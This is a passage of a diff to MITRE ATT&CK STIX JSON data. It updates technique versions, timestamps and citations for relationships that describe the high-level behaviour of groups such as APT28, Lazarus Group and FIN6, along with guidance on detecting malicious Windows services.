"2020-03-25T22:22:10.041Z", + "modified": "2020-09-16T15:49:58.490Z", "created": "2020-01-17T19:13:50.402Z", "x_mitre_platforms": [ "Windows" ], "x_mitre_is_subtechnique": true, - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_detection": "Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts. \n\nLook for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns) \n\nCreation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.\n\nSuspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_effective_permissions": [ "Administrator", @@ -30790,7 +35718,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44", "type": "relationship", - "modified": "2020-07-07T16:44:26.672Z", + "modified": "2020-10-23T15:04:39.981Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -32857,7 +37785,7 @@ ], "source_ref": "intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", @@ -33137,7 +38065,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", "type": "relationship", - "modified": "2020-02-18T16:10:39.260Z", + "modified": "2020-10-21T01:10:54.561Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -33444,11 +38372,16 @@ "url": "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "description": "Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.", "source_name": "FireEye APT28 Hospitality Aug 2017" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], - "description": "(Citation: FireEye APT28 Hospitality Aug 2017)", + "description": "(Citation: FireEye APT28 Hospitality Aug 2017)(Citation: US District Court Indictment GRU Oct 2018) ", "type": "relationship", - "modified": "2019-09-18T15:14:13.514Z", + "modified": "2020-10-06T19:05:11.587Z", "created": "2018-01-16T16:13:52.465Z" }, { @@ -34268,7 +39201,7 @@ { "id": "relationship--c263ca38-f85d-42ab-b56d-8f6121c3aed6", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.(Citation: DOJ GRU Indictment Jul 2018)(Citation: ESET Zebrocy May 2019)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.(Citation: DOJ GRU Indictment Jul 2018)(Citation: ESET Zebrocy May 2019)(Citation: US District Court Indictment GRU Oct 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -34279,16 +39212,21 @@ "url": "https://www.justice.gov/file/1080281/download" }, { - "source_name": "ESET Zebrocy May 2019", + "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.", "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/", - "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019." + "source_name": "ESET Zebrocy May 2019" + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], "source_ref": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c", "relationship_type": "uses", "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", "type": "relationship", - "modified": "2020-03-20T16:37:05.570Z", + "modified": "2020-10-01T18:55:37.604Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -34419,7 +39357,7 @@ ], "source_ref": "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", @@ -34616,15 +39554,16 @@ ], "external_references": [ { + "source_name": "RATANKBA", "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", - "source_name": "RATANKBA" + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", "type": "relationship", - "modified": "2020-03-16T19:26:29.375Z", + "modified": "2020-09-02T18:46:32.513Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -35010,7 +39949,7 @@ { "id": "relationship--aea8401e-774e-47b1-86ac-220cacd11a3c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and PoS malware known as TRINITY.(Citation: FireEye FIN6 April 2016)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and [FrameworkPOS](https://attack.mitre.org/software/S0503).(Citation: FireEye FIN6 April 2016)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -35025,7 +39964,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "type": "relationship", - "modified": "2020-03-28T21:26:57.042Z", + "modified": "2020-10-19T18:18:50.020Z", "created": "2017-05-31T21:33:27.071Z" }, { @@ -35085,7 +40024,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "type": "relationship", - "modified": "2020-03-29T22:52:56.006Z", + "modified": "2020-08-13T20:02:49.814Z", "created": "2017-05-31T21:33:27.029Z" }, { @@ -35792,7 +40731,7 @@ { "id": "relationship--2426519f-c915-4c8f-8164-0d93dbbf0be1", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "A [Lazarus Group](https://attack.mitre.org/groups/G0032) VBA Macro sets its file attributes to System and Hidden.(Citation: McAfee Lazarus Resurfaces Feb 2018)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) has used a VBA Macro to set its file attributes to System and Hidden and has named files with a dot prefix to hide them from the Finder application.(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: SentinelOne Lazarus macOS July 2020)(Citation: TrendMicro macOS Dacls May 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -35801,13 +40740,23 @@ "url": "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", "description": "Sherstobitoff, R. (2018, February 12). Lazarus Resurfaces, Targets Global Banks and Bitcoin Users. Retrieved February 19, 2018.", "source_name": "McAfee Lazarus Resurfaces Feb 2018" + }, + { + "source_name": "SentinelOne Lazarus macOS July 2020", + "url": "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "description": "Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple\u2019s macOS Platform. Retrieved August 7, 2020." + }, + { + "source_name": "TrendMicro macOS Dacls May 2020", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/", + "description": "Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus\u2019 Multi-Platform Attack Capability. Retrieved August 10, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "type": "relationship", - "modified": "2019-09-09T19:15:44.706Z", + "modified": "2020-08-10T13:25:15.950Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -35894,7 +40843,7 @@ { "id": "relationship--0c78e3a7-45c5-454f-8905-a831fbede841", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "TRINITY malware used by [FIN6](https://attack.mitre.org/groups/G0037) encodes data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key.(Citation: FireEye FIN6 April 2016)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -35903,13 +40852,18 @@ "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", "source_name": "FireEye FIN6 April 2016" + }, + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." } ], "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", "relationship_type": "uses", "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "type": "relationship", - "modified": "2020-03-30T02:14:10.613Z", + "modified": "2020-09-09T13:35:31.252Z", "created": "2017-05-31T21:33:27.072Z" }, { @@ -35956,7 +40910,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "type": "relationship", - "modified": "2020-03-13T20:07:14.818Z", + "modified": "2020-09-16T15:10:18.380Z", "created": "2017-05-31T21:33:27.026Z" }, { @@ -36030,7 +40984,7 @@ ], "source_ref": "intrusion-set--dcd81c6e-ebf7-4a16-93e0-9a97fa49c88a", "relationship_type": "uses", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf", @@ -36478,7 +41432,7 @@ { "id": "relationship--3094a14f-ccd2-4ba4-a3f6-c6d2721f02db", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT28](https://attack.mitre.org/groups/G0007) has used [Forfiles](https://attack.mitre.org/software/S0193) to locate PDF, Excel, and Word documents during. The group also searched a compromised DCCC computer for specific terms.(Citation: \u00dcberwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)", + "description": "[APT28](https://attack.mitre.org/groups/G0007) has used [Forfiles](https://attack.mitre.org/software/S0193) to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.(Citation: \u00dcberwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -36498,7 +41452,7 @@ "relationship_type": "uses", "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", "type": "relationship", - "modified": "2019-09-09T17:44:34.709Z", + "modified": "2020-08-04T20:56:21.125Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -36650,7 +41604,7 @@ { "id": "relationship--67b49860-e1e4-4b56-bf83-108c4ac25e5c", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)", + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) can download additional encrypted backdoors onto the victim via GIF files.(Citation: Securelist MiniDuke Feb 2013)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -36659,13 +41613,18 @@ "source_name": "Securelist MiniDuke Feb 2013", "description": "Kaspersky Lab's Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.", "url": "https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", "relationship_type": "uses", "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "type": "relationship", - "modified": "2020-03-17T01:51:01.492Z", + "modified": "2020-10-09T16:07:58.859Z", "created": "2017-12-14T16:46:06.044Z" }, { @@ -37098,19 +42057,24 @@ "url": "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf" }, { - "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "source_name": "Kaspersky Sofacy", "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", - "source_name": "Kaspersky Sofacy" + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" }, { "source_name": "Securelist Sofacy Feb 2018", "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018." + }, + { + "source_name": "US District Court Indictment GRU Oct 2018", + "url": "https://www.justice.gov/opa/page/file/1098481/download", + "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020." } ], - "description": "(Citation: FireEye APT28 January 2017)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)", + "description": "(Citation: FireEye APT28 January 2017)(Citation: Kaspersky Sofacy)(Citation: Securelist Sofacy Feb 2018)(Citation: US District Court Indictment GRU Oct 2018)", "type": "relationship", - "modified": "2019-09-09T17:44:35.742Z", + "modified": "2020-10-01T18:55:44.815Z", "created": "2017-05-31T21:33:27.040Z" }, { @@ -38601,27 +43565,32 @@ { "id": "relationship--f3f122f1-998f-4079-afad-7a59e39f89b7", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. (Citation: F-Secure The Dukes) (Citation: FireEye APT29 Nov 2018)", + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. (Citation: F-Secure The Dukes) (Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" }, { - "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.", "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", - "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018." + "source_name": "FireEye APT29 Nov 2018" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", "relationship_type": "uses", "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "type": "relationship", - "modified": "2020-03-12T00:28:39.619Z", + "modified": "2020-10-09T16:07:58.903Z", "created": "2018-04-18T17:59:24.739Z" }, { @@ -38756,7 +43725,7 @@ "source_name": "Cobalt Strike TTPs Dec 2017" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", "type": "relationship", @@ -39414,7 +44383,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "type": "relationship", - "modified": "2020-03-11T13:58:08.327Z", + "modified": "2020-10-21T01:34:53.424Z", "created": "2017-05-31T21:33:27.019Z" }, { @@ -39571,7 +44540,7 @@ "relationship_type": "mitigates", "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "type": "relationship", - "modified": "2020-03-11T15:09:26.739Z", + "modified": "2020-10-21T19:41:49.587Z", "created": "2017-05-31T21:33:27.027Z" }, { @@ -40944,22 +45913,27 @@ { "id": "relationship--337dc23f-d825-415d-886b-53c3457fbd56", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[APT29](https://attack.mitre.org/groups/G0016) has used WMI event filters to establish persistence.(Citation: Mandiant No Easy Breach)", + "description": "[APT29](https://attack.mitre.org/groups/G0016) has used WMI to establish persistence.(Citation: Mandiant No Easy Breach)(Citation: ESET Dukes October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "Mandiant No Easy Breach", + "url": "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", "description": "Dunwoody, M. and Carr, N.. (2016, September 27). No Easy Breach DerbyCon 2016. Retrieved October 4, 2016.", - "url": "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" + "source_name": "Mandiant No Easy Breach" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." } ], "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", "relationship_type": "uses", "target_ref": "attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58", "type": "relationship", - "modified": "2019-07-25T14:25:53.148Z", + "modified": "2020-10-09T16:07:58.938Z", "created": "2017-05-31T21:33:27.049Z" }, { @@ -40989,7 +45963,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", "type": "relationship", @@ -41140,7 +46114,7 @@ { "id": "relationship--979812c4-939e-4a7e-96b3-348028db10ce", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. [Lazarus Group](https://attack.mitre.org/groups/G0032) also uses secure file deletion to delete files from the victim.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) malware deletes files in various ways, including \"suicide scripts\" to delete malware binaries from the victim. [Lazarus Group](https://attack.mitre.org/groups/G0032) also uses secure file deletion to delete files from the victim.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)(Citation: F-Secure Lazarus Cryptocurrency Aug 2020) ", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -41151,16 +46125,21 @@ "source_name": "Novetta Blockbuster" }, { - "source_name": "McAfee GhostSecret", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/", "description": "Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.", - "url": "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" + "source_name": "McAfee GhostSecret" + }, + { + "source_name": "F-Secure Lazarus Cryptocurrency Aug 2020", + "url": "https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf", + "description": "F-Secure Labs. (2020, August 18). Lazarus Group Campaign Targeting the Cryptocurrency Vertical. Retrieved September 1, 2020." } ], "source_ref": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", "relationship_type": "uses", "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "type": "relationship", - "modified": "2019-09-09T19:15:44.716Z", + "modified": "2020-09-22T16:26:52.951Z", "created": "2017-05-31T21:33:27.066Z" }, { @@ -41464,22 +46443,27 @@ { "id": "relationship--c87cbebf-6b1f-480d-802d-5a2004256183", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "Each time a new drive is inserted, [InvisiMole](https://attack.mitre.org/software/S0260) generates a list of all files on the drive and stores it in an encrypted file.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can sort and collect specific documents as well as generate a list of all files on a newly inserted drive and store them in an encrypted file.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "type": "relationship", - "modified": "2020-03-17T00:09:25.856Z", + "modified": "2020-07-16T15:24:32.873Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -41998,7 +46982,7 @@ { "id": "relationship--ac7d5b88-7929-4f64-abcd-8219caafac24", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used a script to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -42007,13 +46991,18 @@ "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", "source_name": "FireEye FIN6 April 2016" + }, + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." } ], "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", "relationship_type": "uses", "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", "type": "relationship", - "modified": "2019-06-28T14:59:17.592Z", + "modified": "2020-10-09T13:28:48.437Z", "created": "2017-05-31T21:33:27.072Z" }, { @@ -42521,22 +47510,27 @@ { "id": "relationship--eb1c808f-5806-4169-bd41-6ea7c7f17ffb", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[InvisiMole](https://attack.mitre.org/software/S0260) obtains a list of running processes.(Citation: ESET InvisiMole June 2018)", + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can obtain a list of running processes.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "external_references": [ { - "source_name": "ESET InvisiMole June 2018", + "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", "description": "Hromcov\u00e1, Z. (2018, June 07). InvisiMole: Surprisingly equipped spyware, undercover since 2013. Retrieved July 10, 2018.", - "url": "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "source_name": "ESET InvisiMole June 2018" + }, + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." } ], "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", "relationship_type": "uses", "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "type": "relationship", - "modified": "2020-03-17T00:09:25.854Z", + "modified": "2020-08-18T13:13:30.748Z", "created": "2018-10-17T00:14:20.652Z" }, { @@ -42705,7 +47699,7 @@ "source_name": "cobaltstrike manual" } ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "relationship_type": "uses", "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "type": "relationship", @@ -43814,7 +48808,7 @@ { "id": "relationship--51a03c8a-1983-4bdd-b326-78ec67f86f06", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use tasklist to collect a list of running tasks.(Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) can use [Tasklist](https://attack.mitre.org/software/S0057) to collect a list of running tasks.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], @@ -43823,13 +48817,18 @@ "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks 